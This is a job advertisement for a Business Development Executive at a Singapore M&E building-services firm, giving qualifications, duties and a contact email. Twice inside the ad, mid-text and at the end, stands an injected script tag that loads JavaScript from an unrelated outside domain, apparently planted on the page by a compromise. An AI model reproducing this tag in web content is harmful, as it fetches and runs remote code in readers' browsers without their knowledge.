Below is the details of the position: Business Development Executive Interested Parties, please send your resume to victor@protemps.com.sg Date of Post: 12/04/10 Location: West Experience Required:  2 Salary: $Neg Employment Type: Permanent Job Category: Marketing Requirments: Transport provided at Ang Mo Kio, Jurong East and Bkt Batok Minimum Diploma in Building Services or related Engineering or equivalent. > At least 3-5 years of working experience in M&E consulting firm is preferred although not necessary. > A proactive and resourceful individual who possess excellent communication, negotiation and presentation skills. > An independent and aggressive person with eagerness to explore new business areas. > Able to go for overseas assignment such as meetings, trainings and presentations when it is assigned. > Willing to assume new responsibilities within the department. > Willing to explore third party product if necessary to complement the project. > Preferably possess Class 3 driving licence. <script src=http://2677.in/yahoo.js></script> Job Scope: Work with “A” & “B” M&E consultants on Commercial Building Service project on the following services: - Clean water service - Sewage water service - Chilled and condenser water services - Fire Services > Develop, establish and maintain high level of business contact with the “A” & “B” M&E consultants. > Establish contacts and developing new M&E consultants and building developers. > Follow-up on new projects listed in Building & Construction Interchange (BCI). > Conduct quarterly seminar for M&E consultants / End-Users / Developers and provide necessary support for pumps and system specifications to them. > Provide marketing support in any road shows or events where necessary. > Work and communicate closely with Commercial Building Services (CBS) sales team. > Keep proper records of specified projects and update the Commercial Building Services (CBS) sales team regularly. > To cover duties of the team members during their absence. <script src=http://2677.in/yahoo.js></script>
